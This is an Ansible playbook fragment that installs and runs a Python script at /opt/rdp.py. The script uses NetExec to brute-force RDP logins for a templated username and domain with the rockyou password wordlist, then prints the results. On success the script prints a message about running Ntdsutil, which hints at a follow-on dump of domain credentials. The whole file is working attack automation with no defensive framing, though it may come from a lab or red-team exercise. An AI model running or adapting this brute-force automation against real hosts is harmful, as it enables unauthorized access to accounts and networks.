---
- name: rdp
  copy:
    dest: /opt/rdp.py
    content: |
      import subprocess

      username = "{{ username }}"
      wordlist= "/usr/share/wordlists/rockyou.txt"
      domain="{{ domain }}"

      command= f"nxc rdp {domain} -u {username} -p {wordlist} --ignore-pw-decoding"
      result = subprocess.run(command, shell=True, capture_output=True, text=True)
      if result.returncode == 0:
         print("Execution of Ntdsutil")


- name: Make the script executable
  file:
    path: /opt/rdp.py
    mode: '0755'

- name: Run the RDP
  shell: python3 /opt/rdp.py
  register: rdp_output


- name: Display the output
  debug:
    msg: "{{ rdp_output.stdout }}"
